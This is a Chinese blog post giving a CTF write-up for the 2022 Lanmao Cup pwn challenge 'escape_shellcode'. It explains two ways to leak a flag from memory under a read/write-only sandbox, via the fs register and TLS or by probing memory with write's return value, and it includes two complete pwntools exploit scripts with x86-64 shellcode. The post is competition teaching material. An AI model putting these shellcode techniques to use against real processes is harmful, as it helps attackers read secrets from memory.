蓝帽杯2022 pwn escape_shellcode

已于 2022-07-11 21:00:42 修改
阅读量403 收藏 2
点赞数 1
分类专栏: wp 文章标签: linux 运维 服务器 pwn
于 2022-07-11 20:59:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/125724632
版权
该博客介绍了两种方法解决限制仅能使用read和write的shellcode题目。第一种方法通过fs寄存器获取TLS信息,计算出flag地址并write打印。第二种方法利用write返回值特性,逐步找到可行的内存地址,最终定位到flag。文章提供了详细的shellcode实现和解题思路。
摘要由CSDN通过智能技术生成

蓝帽杯2022 pwn escape_shellcode

写shellcode题
在这里插入图片描述
只允许使用read和write,但是程序在开始的时候将flag读取到了bss段上
在这里插入图片描述
在这里插入图片描述
并且在调用shellcode之前还将寄存器的值都给清理掉了。
因为程序开了pie所以直接使用flag地址行不通。那就需要思考一下如何泄露出flag地址。
这里可以借助fs寄存器来得到有关text段的地址,再算出flag地址即可。
fs寄存器用于保存线程局部存储TLS,TLS主要是为了避免多个线程访问同一全局变量或静态变量所导致的冲突。所以fs寄存器周围会有线程地址。在笔者调试的时候发现在0x300这里有一个栈地址,跟进发现里面放着有关text段的地址
在这里插入图片描述
算出flag偏移
在这里插入图片描述
拿到flag地址之后直接write打印出来即可。exp如下

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './escape_shellcode'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('39.107.108.120', 41912)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)
    pause()

flag_addr = 0x555555558120

shellcode = asm('''
xor rsi, rsi
mov rsi, fs:[0x300]
mov rsi, [rsi]
add rsi, 0x2b90
xor rdi, rdi
mov rdi, 1
xor rdx, rdx
mov rdx, 0x50
xor rax, rax
mov rax, 1
syscall
''')
r.send(shellcode)

r.interactive()

解法肯定不止上面这一种,还有一种解法可以利用write遇到不写读的内存时会返回值小于0这个特性来解,我们可以先将rsi放到基址前面也就是根本没有这块内存的地方也就是小于下图的0x555555554000
在这里插入图片描述
然后利用条件判断,每次rsi加上0x500,一直这样直到可以正常读的地址也就是0x555555554000后面。此时就应该在0x555555554000 - 0x555555554500附近,而flag在0x555555558120,我们只需要再让rsi为0x4000这样我们就可以拿到flag了,exp如下

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './escape_shellcode'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('39.107.108.120', 41912)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)
    pause()

shellcode = asm('''
xor rsi, rsi
lea rsi, [rip]
sub rsi, 0x5000000
exp:
  xor rdi, rdi
  mov rdi, 1
  xor rdx, rdx
  mov rdx, 0x500
  xor rax, rax
  mov rax, 1
  syscall
  add rsi, 0x500
cmp rax, 0
jng exp
mov rdx, 0x4000
mov rax, 1
syscall
''')
r.sendline(shellcode)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2022 蓝帽杯 初赛wp
weixin_46483787的博客
07-11 551
蓝帽杯部分wp
2019年度优秀安全内容合集
热门推荐
anquanzushiye的博客
01-06 3万+
2019信息源与信息类型占比微信公众号推荐昵称_英语weixin_no标题网址安全祖师爷PowerShell渗透–帝国https://mp.weixin.qq.com/s/giBR-rn...
vbs shellcode转换escape加密
09-06
用vbs转换加密代码
蓝帽杯2022 pwn Bank
z1r0的博客
07-12 531
保护全开 这道题其实逆清楚了基本就可以解出来了 这里是输入对应的单词就可以进入对应的功能 先看一下Deposit功能 先判断是否login,接着输入多少钱,然后判断一下card_money钱是否足够,如何足够则总钱+输入的,这个函数没什么用。 看一下put函数 这里就是需要存放的钱,判断是否小于总钱。并将需要存放的钱放入card_money中 接下来再看login函数 输入card_numbers,需要过检测 长度大于0,并在0-9之间,接下来输入密码的时候长度需要大于5,也是0-9 满足上面
第六届蓝帽杯 EscapeShellcode
qq_65147345的博客
07-17 183
1.用rip地址进行遍历write输出 2.通过rip的地址对其进行地位抹除操作,然后以页为单位,使用write寻找第一个可以输出的页,然后+flag的偏移就可以拿到flag了
编写并提取简易 ShellCode
weixin_30790841的博客
08-26 224
ShellCode 通常是指一个原始的可执行代码的有效载荷,ShellCode 这个名字来源于攻击者通常会使用这段代码来获得被攻陷系统上的交互 Shell 的访问权限,而现在通常用于描述一段自包含的独立的可执行代码片段。 ShellCode 通常会与漏洞利用并肩使用,或是被恶意代码用于执行进程代码的注入,漏洞利用等,通常情况下 ShellCode 代码无法独立运行,必须依赖于父进程或是 ...
2022蓝帽杯wp
hez__的博客
07-10 619
蓝帽杯 2022 wp
2022蓝帽杯初赛取证部分wp(详细)
qq_63522833的博客
07-10 2737
目录前言手机取证_1&2程序分析_1&2&3计算机取证_2&3&4 前言 本文是2022蓝帽杯初赛取证部分复盘,感觉题目难度适中,因此选择性的记录了做出来的部分。这不是本次比赛完整的WP,如果有需要可以翻一翻其他大师傅的文章 手机取证_1&2 题目描述: 现对一个苹果手机进行取证,请您对以下问题进行分析解答。 1.627604C2-C586-48C1-AA16-FF33C3022159.PNG图片的分辨率是?(答案参考格式:1920x1080) 2.姜总的
2022蓝帽杯初赛部分wp
qq_55882340的博客
07-11 1324
2022蓝帽杯初赛部分wp
蓝帽杯2022初赛 部分wp
akxnxbshai的博客
07-10 890
蓝帽杯2022初赛部分wp
2020全国工业互联网安全技术技能大赛题目
10-28
含有misc,re,crypto,pwn及题目说明
shellcode 编写原则 一
qq_45951598的博客
05-21 317
VS在开发平台汇总,双引号字符串会被编译到只读数据段,已引用绝对地址的使用。 而在shellcode编程中,要尽量 避免一切绝对地址的使用。 无字节 int EntryMain() { return 0; } 有字节 int EntryMain() { char szData[] = "123456"; //char *pszData = "123456"; return 0; } 这里我们有字节和无字节生成的程序对比,发现不同的地方在这 其他的就一样了,这里因为我们的代码优化原.
2021蓝帽杯总决赛wp
onl_llo的博客
08-30 1293
2021蓝帽杯总决赛wp pwn secretcode 程序分析 只允许open和read read的fd >= 0x14 shellcode的限制: 不能有00, 会被strcpy截断 调⽤shellcode时, rax r10执⾏shellcode 思路: 侧信道泄露flag 先多次open让flag对应的fd为0x14 然后read读⼊⽂件内容到rsp处 爆破[rsp+idx]处的字符, 如果为C, 则死循环, 否则就触发⼀个SIGV 细节: 构造"flag": mov eax, "fl
蓝帽杯2021 One Pointer PHP
Tajang的大千世界
11-23 3792
第一次打FPM/FastCGI的题,实际上也是第一次接触打中间件的题,刚开始是在陇原战“疫”碰到了一道类似的题,也是改编的这道,为了更好地复现这道题,理解这道题,我去把Fastcgi 协议分析与 PHP-FPM 攻击方法都看了几遍。攻击的实操部分,本来想着复现,但那个鬼环境一直差点意思。这里不得不提中国网安界大神——phith0n,P神开创的vulhub确实帮了国内外网络安全学习者的大忙,让安全研究者更加专注于漏洞原理本身,而不是忙于搭建复杂的漏洞环境。但不幸的事,这个洞的环境坏了,问了P神说官网要下架,让
2022.7.9 第六届蓝帽杯复现
Pai_Space
07-11 846
2022.7.9 第六届蓝帽杯复现
pwn学习】pwn中的简单shellcode
Morphy_Amo的博客
12-20 1205
编写简单的shellcodelinux32位系统中,最简单的获取shell的方式是通过系统调用execve获得 execve('/bin/sh',0,0); 写成汇编的话如下: global _start _start: xor edx, edx xor ecx, ecx push '/sh' push '/bin' mov ebx, esp mov eax, 0xb int 80h 编译
2019蓝帽杯_多漏洞组合-堆栈格式化
Jc
01-20 394
文件安全机制 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) file信息 ./pwn: ELF 64-bit LSB executable, x86-6...
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1584
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
pwn -- 沙盒机制详解
lifanxin的博客
05-13 6452
沙盒机制详解概述开启沙盒的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别沙盒两道例题pwnable_asm参考博客总结 概述   沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。   在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只
2022强网杯pwn赛题详解:基于largebinattack的houseofapple漏洞利用
强网杯2022年的Pwn赛题解析主要聚焦于一道难度较高的题目"house_of_cat",该题挑战者需利用glibc 2.35版本中的漏洞进行攻击,这是当时Ubuntu 22.04系统上最新版glibc。题目吸引了众多参赛队伍,但因涉及高级的_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值